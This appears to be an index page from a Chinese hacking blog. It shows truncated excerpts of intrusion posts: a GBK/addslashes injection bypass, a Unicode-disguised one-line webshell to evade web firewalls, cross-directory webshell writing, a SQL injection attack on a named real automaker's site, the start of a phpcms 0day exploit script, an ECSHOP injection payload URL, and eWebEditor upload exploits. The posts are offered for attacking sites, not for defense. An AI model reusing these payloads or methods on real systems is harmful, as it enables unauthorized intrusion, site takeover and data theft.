其实这东西国内少数黑客早已知道,只不过没有共享公布而已。有些人是不愿共享,宁愿烂在地里,另外的一些则是用来牟利。 该漏洞最早2006年被国外用来讨论数据库字符集设为GBK时,0xbf27本身不是一个有效的GBK字符,但经过 addslashes()...
阅读更多”unicode变形一句话突破web防火墙过滤
现在有不少服务器加了web的防火墙,用来过滤含asp/jsp/php的网马代码,全部用空格替换, 比较讨厌,不过后来刚好想到以前的一句话时候的unicode编码,那就也搞一个吧。 1.新建一个mdb 2.建表,考入:┼攠數畣整爠煥敵瑳∨≡┩> nbsp; (实际是< % execute...
阅读更多
”一种少见的跨目录写webshell方法
author:小柯 今天跟木JJ看一个站,顺利拿到旁注站的shell,大致看了下,管理员不是很傻,设置成了虚拟主机权限。目标站的目录跨不了 当然,第一想到的是提权,看到wscrip.shell组件还在 大喜,操上工具一阵 狂搞,不行,能用的会用的方法都试了,还是不行。 IIS...
阅读更多”入侵检测东南汽车网
文章作者:、音符\ 今天本来是想入侵检测本地的东南书店的,但是居然网站关了.就拿这个东南汽车(www.soueast-motor.com)当替罪羊了。 随便点一个连接http://www.soueast-motor.com/qyxw/qyxw-next.aspx?id=6728在后边加上单引号,如图 爆出错误。 并找到如下主要说明:System.Data.SqlClient.SqlException: 字符串 ‘ and newsdata.parentid = newslist.id’...
阅读更多”phpcms2008 SP3 0day+exp,附带利用方法
又是t00ls传出来的,t00ls牛人可真多。 关键词 inurl:ask/show.php 安装phpnow,当然别的软件也可以,反正就是需要配置一个本机PHP环境,这个很重要! yp为企业黄页所放置的目录 下面为EXP 第一个exp <?php ini_set("max_execution_time",0); error_reporting(7); function usage() { global $argv; exit( "\n--+++============================================================+++--". "\n--+++======...
阅读更多”ECSHOP 2.7.X注入漏洞[附EXP利用工具]
http://www.example.com/shop/category.php?page=1&sort=goods_id&order=ASC# goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filte r_attr=-999 Test it : http://www.example.com/shop/category.php?page=1&sort=goods_id&order=ASC% 23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&fil ter_attr=-999%20OR%20length(session_user())=14%20or%201=2...
阅读更多”入侵经验总结
1.无论什么站,无论什么语言,我要渗透,第一件事就是扫目录,最好一下扫出个上传点,直接上传shell,诸位不要笑,有时候你花很久搞一个站,最后发现有个现成的上传点,而且很容易猜到,不过这种情况发生在asp居多!...
阅读更多”数据库只读时eWebEditor的上传漏洞利用
大家经常会遇到存在ewebeditor但是却没有办法更新样式的情况,这往往是由于管理员为了安全把数据库设置为了只读。就算是只读我们也有办法突破。理论上只要条件符合并且数据库一样就可以利用,并不一定要求版本号完全一致。 下面按照版本号分别阐述,将代码保存为htm文件即可利用: 1、ewebeditor 1.0.0...
阅读更多
